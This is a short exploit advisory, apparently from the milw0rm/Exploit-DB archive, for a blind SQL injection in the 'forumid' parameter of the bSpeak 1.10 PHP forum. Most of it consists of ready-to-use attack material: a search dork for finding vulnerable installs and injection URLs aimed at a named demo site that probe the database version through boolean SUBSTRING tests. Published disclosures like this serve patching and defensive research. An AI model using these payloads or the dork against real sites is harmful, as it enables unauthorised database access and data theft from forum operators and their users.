bSpeak 1.10 - 'forumid' Blind SQL Injection

EDB-ID:

8751


Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2009-05-20


#-------------------------AllaH AkbaR-------------------------------
#forum bspeak v1.10  Blind SQL Injection Exploit
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
#            Aflawa Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#
#Script:forum (bspeak v1.10) www.26thavenue.com/index.php
#
#Demo:http://www.26thavenue.com//bspeakdemo/
#
#Dork:"Powered by bSpeak 1.10"
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3'
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4 oui :)
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=5 no  :)
#
#-------------------------SNAKES TEAM-------------------------------
#Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-20]